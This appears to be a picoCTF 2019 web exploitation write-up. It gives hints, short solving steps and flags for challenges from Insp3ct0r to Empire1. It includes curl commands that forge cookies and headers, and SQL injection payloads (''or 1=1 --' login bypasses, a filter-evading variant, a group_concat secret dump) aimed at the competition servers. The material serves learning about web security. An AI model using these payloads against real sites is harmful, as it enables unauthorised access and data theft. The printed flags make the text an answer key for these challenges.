Web Exploitation Writeup
- Insp3ct0r - Points: 50
- dont-use-client-side - Points: 100
- logon - Points: 100
- where are the robots - Points: 100
- Client-side-again - Points: 200
- Open-to-admins - Points: 200
- picobrowser - Points: 200
- Irish-Name-Repo 1 - Points: 300
- Irish-Name-Repo 2 - Points: 350
- Irish-Name-Repo 3 - Points: 400
- Empire1 - Points: 400
- Empire2 - Points: 450
Table of Contents
- Insp3ct0r - Points: 50
- Kishor Balan tipped us off that the following code may need inspection: https://2019shell1.picoctf.com/problem/63975/ (link) or http://2019shell1.picoctf.com:63975
Hint: How do you inspect web code on a browser? There's 3 parts
Analyze html, css and js
picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?d3db9182}
- dont-use-client-side - Points: 100
- Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/45147/ (link) or http://2019shell1.picoctf.com:45147
Hint: Never trust the client
Find the flag viewing source
picoCTF{no_clients_plz_4a60f3}
- logon - Points: 100
- The factory is hiding things from all of its users. Can you login as logon and find what they've been looking at? https://2019shell1.picoctf.com/problem/32270/ (link) or http://2019shell1.picoctf.com:32270
Hint: Hmm it doesn't seem to check anyone's password, except for {{name}}'s?
- Log in as admin
- Inspect element and check for Storage (we are looking for cookies)
- Change the value of admin line to True instead of False
picoCTF{l3arn_th3_r0p35}
- where are the robots - Points: 100
- Can you find the robots? https://2019shell1.picoctf.com/problem/32229/ (link) or http://2019shell1.picoctf.com:32229
Hint: What part of the website could tell you where the creator doesn't want you to look?
$ wget --spider -r --no-parent http://2019shell1.picoctf.com:32229
picoCTF{ca1cu1at1ng_Mach1n3s_0ecd0}
- Client-side-again - Points: 200
- Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/47277/ (link) or http://2019shell1.picoctf.com:47277
Hint: What is obfuscation?
Analyze the javascript and reoder it
picoCTF{not_this_again_d29871}
- Open-to-admins - Points: 200
- This secure website allows users to access the flag only if they are admin and if the time is exactly 1400. https://2019shell1.picoctf.com/problem/12276/ (link) or http://2019shell1.picoctf.com:12276
Hint: Can cookies help you to get the flag?
$ curl "https://2019shell1.picoctf.com/problem/12276/flag" -H "Cookie: time=1400; admin=True;" -s | grep -oE "picoCTF{.*}"
picoCTF{0p3n_t0_adm1n5_dcb566bb}
- picobrowser - Points: 200
- This website can be rendered only by picobrowser, go and catch the flag! https://2019shell1.picoctf.com/problem/12255/ (link) or http://2019shell1.picoctf.com:12255
Hint: You dont need to download a new web browser
$ curl "https://2019shell1.picoctf.com/problem/12255/flag" -H "User-Agent:picobrowser" -s | grep -oE "picoCTF{.*}"
picoCTF{p1c0_s3cr3t_ag3nt_bbe8a517}
- Irish-Name-Repo 1 - Points: 300
- There is a website running at https://2019shell1.picoctf.com/problem/32241/ (link) or http://2019shell1.picoctf.com:32241. Do you think you can log us in? Try to see if you can login!
Hint: There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?
Hint: Try to think about how does the website verify your login?
- It's a SQL injection type challenge. In the login form page, look for the debug line (CTRL + U to view source code) and change the value to 1 and try to submit a randomly login request
<input type="hidden" name="debug" value="1">
- Output should looks like as following
username: admin
password: admin
SQL query: SELECT * FROM users WHERE name='admin' AND password='admin'
Login failed.
- To bypass the authentication login SQLi string is needed
# 'or 1=1 --
curl "https://2019shell1.picoctf.com/problem/32241/login.php" --data "username='+or+1=1+--&password=1234" && echo
picoCTF{s0m3_SQL_0397f20c}
- Irish-Name-Repo 2 - Points: 350
- There is a website running at https://2019shell1.picoctf.com/problem/14912/ (link). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://2019shell1.picoctf.com:14912
Hint: The password is being filtered.
- As the previous one, it's a SQL injection type challenge. The only difference this time it's that a check to our input is performed. The following do the job to solve this challenge
curl "https://2019shell1.picoctf.com/problem/14912/login.php" --data "username='+--&password=admin" && echo
picoCTF{m0R3_SQL_plz_752d1173}
- Irish-Name-Repo 3 - Points: 400
- There is a secure website running at https://2019shell1.picoctf.com/problem/47247/ (link) or http://2019shell1.picoctf.com:47247. Try to see if you can login as admin!
Hint: Seems like the password is encrypted.
- As the previous one, it's a SQL injection type challenge. However this time the password seems to be encrypted in some way. After setting the value of debug to 1 as before and performed an authentication request, the output is:
password: 'or 1=1--
SQL query: SELECT * FROM admin where password = ''be 1=1--'
- To solve this challenge the same encryption is needed
# 'be 1=1 --
curl "https://2019shell1.picoctf.com/problem/47247/login.php" --data "password='+be+1=1+--" && echo
picoCTF{3v3n_m0r3_SQL_c2c37f5e}
- Empire1 - Points: 400
- Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/49726/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:49726
Hint: Pay attention to the feedback you get
Hint: There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.
Hint: The database gets reverted every 2 hours if you do break it, just come back later
- SQLi on the register/login page is the first thing that has been tried: these pages doesn’t seem to be vulnerable to SQLi. So an user has been created. After the login, the first thing has been noticed is the todo page, a simple injection has been tried. It didn't work, again, but an error has been displayed after. It's the right way. After some others attempt and some research, the string which helped to solve the challenge is:
'||( select group_concat(secret) from user) ||'
picoCTF{wh00t_it_a_sql_injectdf389592}